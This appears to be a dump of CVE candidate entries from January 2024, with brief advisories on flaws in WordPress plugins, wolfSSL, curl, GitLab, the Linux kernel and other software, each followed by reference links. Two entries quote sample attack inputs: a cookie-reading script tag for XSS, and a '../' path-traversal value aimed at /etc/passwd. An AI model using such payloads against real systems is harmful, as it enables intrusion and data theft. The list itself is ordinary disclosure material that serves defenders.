CVE 2024 907 Candidate The NEX-Forms – Ultimate Form Builder – Contact forms and much more plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the restore_records() function in all versions up to, and including, 8.5.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to restore records. MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1493 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1512 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/tags/8.5.7/includes/classes/class.dashboard.php#L1539 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1490 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1502 | MISC:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524 | URL:https://plugins.trac.wordpress.org/browser/nex-forms-express-wp-form-builder/trunk/includes/classes/class.dashboard.php#L1524 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bd4058-ef00-48c8-8ab5-01535f0238a4?source=cve Assigned (20240125)
CVE 2024 906 Candidate The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API. This makes it possible for unauthenticated attackers to obtain page and post contents of a site protected with this plugin. MISC:https://wordpress.org/plugins/fx-private-site/ | URL:https://wordpress.org/plugins/fx-private-site/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve Assigned (20240125)
CVE 2024 903 Candidate The User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_submitted' 'link' value in all versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in the feedback submission page that will execute when a user clicks the link, while also pressing the command key. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038797%40userfeedback-lite&new=3038797%40userfeedback-lite&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a649fbea-65cf-45c9-b853-2733f27518af?source=cve Assigned (20240125)
CVE 2024 901 Candidate Remotely executed SEGV and out of bounds read allows malicious packet sender to crash or cause an out of bounds read via sending a malformed packet with the correct length. MISC:https://github.com/wolfSSL/wolfssl/issues/7089 | URL:https://github.com/wolfSSL/wolfssl/issues/7089 | MISC:https://github.com/wolfSSL/wolfssl/pull/7099 | URL:https://github.com/wolfSSL/wolfssl/pull/7099 Assigned (20240125)
CVE 2024 898 Candidate The Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. MISC:https://wordpress.org/plugins/chat-bubble/ | URL:https://wordpress.org/plugins/chat-bubble/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a56772fd-f77f-4ba5-b5c4-79ac8204b599?source=cve Assigned (20240125)
CVE 2024 897 Candidate The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the image URL parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/21d1feae-e70f-439d-8992-f136211fdde0?source=cve Assigned (20240125)
CVE 2024 896 Candidate The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button link parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13 | URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/modules/button/includes/frontend.php#L13 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032810%40beaver-builder-lite-version%2Ftrunk&old=3012562%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/96086886-72f4-4a62-8f31-fc20e5240ba4?source=cve Assigned (20240125)
CVE 2024 895 Candidate The PDF Flipbook, 3D Flipbook – DearFlip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via outline settings in all versions up to, and including, 2.2.26 due to insufficient input sanitization and output escaping on user supplied data. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483 | URL:https://plugins.trac.wordpress.org/browser/3d-flipbook-dflip-lite/trunk/inc/metaboxes.php#L483 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030441%403d-flipbook-dflip-lite&new=3030441%403d-flipbook-dflip-lite&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/92e37b28-1a17-417a-b40f-cb4bbe6ec759?source=cve Assigned (20240125)
CVE 2024 891 Candidate A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input <script>alert(document.cookie)</script> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-252043. MISC:https://github.com/biantaibao/octopus_XSS/blob/main/report.md | URL:https://github.com/biantaibao/octopus_XSS/blob/main/report.md | MISC:https://vuldb.com/?ctiid.252043 | URL:https://vuldb.com/?ctiid.252043 | MISC:https://vuldb.com/?id.252043 | URL:https://vuldb.com/?id.252043 Assigned (20240125)
CVE 2024 890 Candidate A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability. MISC:https://github.com/biantaibao/octopus_SQL2/blob/main/report.md | URL:https://github.com/biantaibao/octopus_SQL2/blob/main/report.md | MISC:https://vuldb.com/?ctiid.252042 | URL:https://vuldb.com/?ctiid.252042 | MISC:https://vuldb.com/?id.252042 | URL:https://vuldb.com/?id.252042 Assigned (20240125)
CVE 2024 889 Candidate A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability. MISC:https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176661/Golden-FTP-Server-2.02b-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.252041 | URL:https://vuldb.com/?ctiid.252041 | MISC:https://vuldb.com/?id.252041 | URL:https://vuldb.com/?id.252041 Assigned (20240125)
CVE 2024 888 Candidate A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039. MISC:https://fitoxs.com/vuldb/27-exploit-perl.txt | URL:https://fitoxs.com/vuldb/27-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252039 | URL:https://vuldb.com/?ctiid.252039 | MISC:https://vuldb.com/?id.252039 | URL:https://vuldb.com/?id.252039 Assigned (20240125)
CVE 2024 887 Candidate A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability. MISC:https://fitoxs.com/vuldb/18-exploit-perl.txt | URL:https://fitoxs.com/vuldb/18-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252038 | URL:https://vuldb.com/?ctiid.252038 | MISC:https://vuldb.com/?id.252038 | URL:https://vuldb.com/?id.252038 Assigned (20240125)
CVE 2024 886 Candidate A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability. MISC:https://fitoxs.com/vuldb/09-exploit-perl.txt | URL:https://fitoxs.com/vuldb/09-exploit-perl.txt | MISC:https://vuldb.com/?ctiid.252037 | URL:https://vuldb.com/?ctiid.252037 | MISC:https://vuldb.com/?id.252037 | URL:https://vuldb.com/?id.252037 Assigned (20240125)
CVE 2024 885 Candidate A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036. MISC:https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176633/SpyCamLizard-1.230-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.252036 | URL:https://vuldb.com/?ctiid.252036 | MISC:https://vuldb.com/?id.252036 | URL:https://vuldb.com/?id.252036 Assigned (20240125)
CVE 2024 884 Candidate A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects the function exec of the file payment.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252035. MISC:https://blog.csdn.net/Q_M_0_9/article/details/135846415 | URL:https://blog.csdn.net/Q_M_0_9/article/details/135846415 | MISC:https://vuldb.com/?ctiid.252035 | URL:https://vuldb.com/?ctiid.252035 | MISC:https://vuldb.com/?id.252035 | URL:https://vuldb.com/?id.252035 Assigned (20240125)
CVE 2024 883 Candidate A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects the function prepare of the file admin/pay.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252034 is the identifier assigned to this vulnerability. MISC:https://blog.csdn.net/weixin_56393356/article/details/135756616 | URL:https://blog.csdn.net/weixin_56393356/article/details/135756616 | MISC:https://vuldb.com/?ctiid.252034 | URL:https://vuldb.com/?ctiid.252034 | MISC:https://vuldb.com/?id.252034 | URL:https://vuldb.com/?id.252034 Assigned (20240125)
CVE 2024 882 Candidate A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md | URL:https://github.com/biantaibao/LinkWechat-Scrm_arbitrary-file-download-vulnerability/blob/main/report.md | MISC:https://vuldb.com/?ctiid.252033 | URL:https://vuldb.com/?ctiid.252033 | MISC:https://vuldb.com/?id.252033 | URL:https://vuldb.com/?id.252033 Assigned (20240125)
CVE 2024 880 Candidate A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md | URL:https://github.com/gtqbhksl/weekdays_something/blob/main/qdb_csrf.md | MISC:https://vuldb.com/?ctiid.252032 | URL:https://vuldb.com/?ctiid.252032 | MISC:https://vuldb.com/?id.252032 | URL:https://vuldb.com/?id.252032 Assigned (20240125)
CVE 2024 879 Candidate Authentication bypass in vector-admin allows a user to register to a vector-admin server while “domain restriction” is active, even when not owning an authorized email address. MISC:https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41 | URL:https://github.com/Mintplex-Labs/vector-admin/pull/128/commits/a581b8177dd6be719a5ef6d3ce4b1e939636bb41 | MISC:https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/ | URL:https://research.jfrog.com/vulnerabilities/vector-admin-filter-bypass/ Assigned (20240125)
CVE 2024 871 Candidate The Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Icon Widget 'fl_builder_data[node_preview][link]' and 'fl_builder_data[settings][link_target]' parameters in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version | URL:https://plugins.trac.wordpress.org/changeset/3032810/beaver-builder-lite-version | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/26bfef74-214f-4257-afc7-730e82e80946?source=cve Assigned (20240124)
CVE 2024 869 Candidate The Instant Images – One Click Image Uploads from Unsplash, Openverse, Pixabay and Pexels plugin for WordPress is vulnerable to unauthorized arbitrary options update due to an insufficient check that neglects to verify whether the updated option belongs to the plugin on the instant-images/license REST API endpoint in all versions up to, and including, 6.1.0. This makes it possible for authors and higher to update arbitrary options. MISC:https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91 | URL:https://plugins.trac.wordpress.org/browser/instant-images/tags/6.1.0/api/license.php#L91 | MISC:https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php | URL:https://plugins.trac.wordpress.org/changeset/3027110/instant-images/tags/6.1.1/api/license.php | MISC:https://wordpress.org/plugins/instant-images/ | URL:https://wordpress.org/plugins/instant-images/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/17941fbb-c5da-4f5c-a617-3792eb4ef395?source=cve Assigned (20240124)
CVE 2024 866 Candidate The Check & Log Email plugin for WordPress is vulnerable to Unauthenticated Hook Injection in all versions up to, and including, 1.0.9 via the check_nonce function. This makes it possible for unauthenticated attackers to execute actions with hooks in WordPress under certain circumstances. The action the attacker wishes to execute needs to have a nonce check, and the nonce needs to be known to the attacker. Furthermore, the absence of a capability check is a requirement. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050794%40check-email&new=3050794%40check-email&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9ae9307c-680c-43c7-8246-a3e6149c1fb6?source=cve Assigned (20240124)
CVE 2024 864 Candidate Enabling Simple Ajax Uploader plugin included in Laragon open-source software allows for a remote code execution (RCE) attack via an improper input validation in a file_upload.php file which serves as an example. By default, Laragon is not vulnerable until a user decides to use the aforementioned plugin. MISC:https://cert.pl/en/posts/2024/02/CVE-2024-0864 | URL:https://cert.pl/en/posts/2024/02/CVE-2024-0864 | MISC:https://cert.pl/posts/2024/02/CVE-2024-0864 | URL:https://cert.pl/posts/2024/02/CVE-2024-0864 | MISC:https://laragon.org/ | URL:https://laragon.org/ Assigned (20240124)
CVE 2024 861 Candidate An issue has been discovered in GitLab EE affecting all versions starting from 16.4 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Users with the `Guest` role can change `Custom dashboard projects` settings contrary to permissions. MISC:GitLab Issue #439240 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/439240 | MISC:HackerOne Bug Bounty Report #2316435 | URL:https://hackerone.com/reports/2316435 Assigned (20240124)
CVE 2024 860 Candidate The affected product is vulnerable to a cleartext transmission of sensitive information vulnerability, which may allow an attacker to capture packets to craft their own requests. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-13 Assigned (20240124)
CVE 2024 859 Candidate The Affiliates Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.9.34. This is due to missing or incorrect nonce validation on the process_bulk_action function in ListAffiliatesTable.php. This makes it possible for unauthenticated attackers to delete affiliates via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php | URL:https://plugins.trac.wordpress.org/browser/affiliates-manager/trunk/classes/ListAffiliatesTable.php | MISC:https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk | URL:https://plugins.trac.wordpress.org/changeset/3028484/affiliates-manager/trunk?contextall=1&old=3015278&old_path=%2Faffiliates-manager%2Ftrunk | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/433a03c2-09fd-4ce6-843b-55ad09f4b4f7?source=cve Assigned (20240124)
CVE 2024 858 Candidate The Innovs HR WordPress plugin through 1.0.3.4 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding them as employees. MISC:https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/ | URL:https://wpscan.com/vulnerability/f6627a35-d158-495e-9d56-69405cfca221/ Assigned (20240124)
CVE 2024 856 Candidate The Appointment Booking Calendar WordPress plugin before 1.3.83 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks such as adding a booking to the calendar without paying. MISC:https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/ | URL:https://wpscan.com/vulnerability/eb383600-0cff-4f24-8127-1fb118f0565a/ Assigned (20240124)
CVE 2024 855 Candidate The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users/admins that a page was created by a Contributor+. MISC:https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/ | URL:https://wpscan.com/vulnerability/5d5da91e-3f34-46b0-8db2-354a88bdf934/ Assigned (20240124)
CVE 2024 854 Candidate URL redirection to untrusted site ('Open Redirect') vulnerability in file access component in Synology DiskStation Manager (DSM) before 7.2.1-69057-2 allows remote authenticated users to conduct phishing attacks via unspecified vectors. MISC:Synology-SA-24:02 DSM | URL:https://www.synology.com/en-global/security/advisory/Synology_SA_24_02 Assigned (20240124)
CVE 2024 853 Candidate curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer to the same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check. CONFIRM:https://security.netapp.com/advisory/ntap-20240307-0004/ | MISC:issue | URL:https://hackerone.com/reports/2298922 | MISC:json | URL:https://curl.se/docs/CVE-2024-0853.json | MISC:www | URL:https://curl.se/docs/CVE-2024-0853.html Assigned (20240124)
CVE 2024 849 Candidate Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible because the application is vulnerable to LFR. MISC:https://fluidattacks.com/advisories/alesso | URL:https://fluidattacks.com/advisories/alesso | MISC:https://github.com/leanote/desktop-app | URL:https://github.com/leanote/desktop-app Assigned (20240124)
CVE 2024 844 Candidate The Popup More Popups, Lightboxes, and more popup modules plugin for WordPress is vulnerable to Local File Inclusion in version 2.1.6 via the ycfChangeElementData() function. This makes it possible for authenticated attackers, with administrator-level access and above, to include and execute arbitrary files ending with "Form.php" on the server , allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. MISC:https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184 | URL:https://plugins.trac.wordpress.org/browser/popup-more/trunk/classes/Ajax.php#L184 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7894a19c-b873-4c5b-8c82-6656cc306ee2?source=cve Assigned (20240123)
CVE 2024 842 Candidate The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Denial of Service in all versions up to, and including, 1.2.5. This is due to direct access of the backuply/restore_ins.php file and. This makes it possible for unauthenticated attackers to make excessive requests that result in the server running out of resources. MISC:https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php | URL:https://plugins.trac.wordpress.org/changeset/3033242/backuply/trunk/restore_ins.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1f955d88-ab4c-4cf4-a23b-91119d412716?source=cve Assigned (20240123)
CVE 2024 841 Candidate A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system. MISC:RHBZ#2256490 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256490 | MISC:https://access.redhat.com/security/cve/CVE-2024-0841 | URL:https://access.redhat.com/security/cve/CVE-2024-0841 Assigned (20240123)
CVE 2024 839 Candidate The FeedWordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2022.0222 due to missing validation on the user controlled 'guid' key. This makes it possible for unauthenticated attackers to view draft posts that may contain sensitive information. MISC:https://wordpress.org/plugins/feedwordpress/ | URL:https://wordpress.org/plugins/feedwordpress/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1ead46fd-5744-4fbb-9efd-980f9216abbc?source=cve Assigned (20240123)
CVE 2024 838 Candidate The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the side image URL parameter in the Age Gate in all versions up to, and including, 3.10.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121 | URL:https://plugins.trac.wordpress.org/browser/happy-elementor-addons/tags/3.10.1/widgets/age-gate/widget.php#L2121 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028056%40happy-elementor-addons%2Ftrunk&old=3016053%40happy-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d55bab2a-5e2e-440e-b4fa-03853679ba22?source=cve Assigned (20240123)
CVE 2024 836 Candidate The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews. MISC:https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php | URL:https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve Assigned (20240123)
CVE 2024 835 Candidate The Royal Elementor Kit theme for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the dismissed_handler function in all versions up to, and including, 1.0.116. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to true and not arbitrary values. MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail= | URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail= | MISC:https://wordpress.org/themes/royal-elementor-kit/ | URL:https://wordpress.org/themes/royal-elementor-kit/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve Assigned (20240123)
